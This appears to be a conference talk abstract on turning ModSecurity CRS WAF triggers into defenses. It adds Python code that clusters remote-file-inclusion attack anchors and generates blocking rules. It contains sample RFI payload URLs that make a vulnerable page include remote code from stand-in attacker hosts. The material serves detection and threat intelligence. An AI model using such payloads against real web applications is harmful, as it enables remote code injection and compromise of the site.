ModSecurity Web Application Firewall was first released more than a decade ago as open source software that gives the ability to protect web applications. Over the years ModSecurity has matured significantly, and it is the most widely deployed WAF, protecting millions of websites. Alongside the ModSecurity engine we can also find the OWASP ModSecurity Core Rule Set (CRS), a library of generic application security signatures that provides a base level of protection for any web application.
In this presentation I will show an advanced technique for post-processing ModSecurity Core Rule Set WAF triggers in order to generate actionable defenses derived from those triggers. The objective of the post-processing is to improve security controls: based on the collected malicious HTTP traffic we can produce new insights into our attackers and the techniques they use, and as a result we can harden defenses and improve our mitigations.
The presentation will include a detailed description of several techniques, with case studies based on real traffic from Akamai's security big data platform (Cloud Security Intelligence).
Example: analysis of a remote file inclusion attack:
When analyzing the payload of a remote file inclusion attack we will find a link to a remote source code file that the attackers are trying to inject into the vulnerable application.
The injected remote source file is in many cases a static "anchor" in a continuous attack campaign that uses various RFI vulnerabilities with the same remote file.
Generating a signature that matches attacks based on this attack "anchor" can improve the detection capabilities of ModSecurity CRS and at the same time give better insight into the threat landscape.
Beyond that, the "anchor" can be used as enrichment for other security controls that monitor URL and domain reputation.
RFI attack:
http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicous.php
In the attack above we can see the remote source file located at "www.attacker.com/malicous.php"; this malicious file reference can be valuable for:
Looking for the same link in HTTP traffic (complementary to the ModSecurity CRS rules)
Blocking traffic from within the organization to the attacker's web application
Correlating similar attacks as the same distributed attack campaign
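The post-processing sketched above, as an added example written for this page rather than code from the presentation or from Akamai's platform: it extracts the remote-file "anchor" from request URIs that triggered the CRS RFI rules, clusters triggers by anchor, and emits a ModSecurity SecRule per recurring anchor. The sample trigger URIs are constructed here (reusing the abstract's example hosts), and the rule id range is a placeholder an operator would replace.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qsl

# Constructed sample request URIs standing in for CRS RFI triggers; the
# hosts are the abstract's example hosts, not real indicators.
SAMPLE_TRIGGERS = [
    "/vuln_page.php?file=http://www.attacker.com/malicous.php",
    "/index.php?page=HTTP://www.attacker.com/malicous.php?",
    "/show.php?inc=http://www.attacker.com/malicous.php%3F",
    "/cms/view.php?tpl=https://files.example.org/shell.txt&x=1",
    "/index.php?page=about",  # trigger without a remote URL: no anchor
]

REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

def extract_anchor(request_uri):
    """Return the remote file anchor (host/path, normalized) carried in any
    query parameter of a triggered request, or None if there is none."""
    for _, value in parse_qsl(urlparse(request_uri).query, keep_blank_values=True):
        if not REMOTE_URL.match(value):
            continue
        remote = urlparse(value)
        # Lowercase the host and drop a trailing "?" so the same remote file
        # clusters together regardless of how the payload was written.
        return f"{remote.netloc.lower()}{remote.path.rstrip('?') or '/'}"
    return None

def cluster_by_anchor(request_uris):
    """Count triggers per anchor: one campaign abusing many RFI
    vulnerabilities with the same remote file shows up as one cluster."""
    return Counter(a for a in map(extract_anchor, request_uris) if a)

def anchor_secrule(anchor, rule_id):
    """Emit a ModSecurity rule matching the anchor in any argument,
    complementary to the generic CRS RFI rules."""
    if '"' in anchor or "'" in anchor:
        raise ValueError("anchor would break SecRule quoting: %r" % anchor)
    return (f'SecRule ARGS "@contains {anchor}" '
            f'"id:{rule_id},phase:2,t:none,t:lowercase,t:urlDecodeUni,'
            f"deny,log,msg:'RFI campaign anchor {anchor}'\"")

def generate_rules(request_uris, first_id=9000001, min_hits=2):
    """One rule per anchor seen at least min_hits times (placeholder ids)."""
    clusters = cluster_by_anchor(request_uris).most_common()
    return [anchor_secrule(anchor, first_id + i)
            for i, (anchor, hits) in enumerate(clusters) if hits >= min_hits]

if __name__ == "__main__":
    for rule in generate_rules(SAMPLE_TRIGGERS):
        print(rule)
```

The `min_hits` threshold keeps one-off payloads from becoming rules; the same anchor list can also feed the URL/domain reputation controls mentioned above.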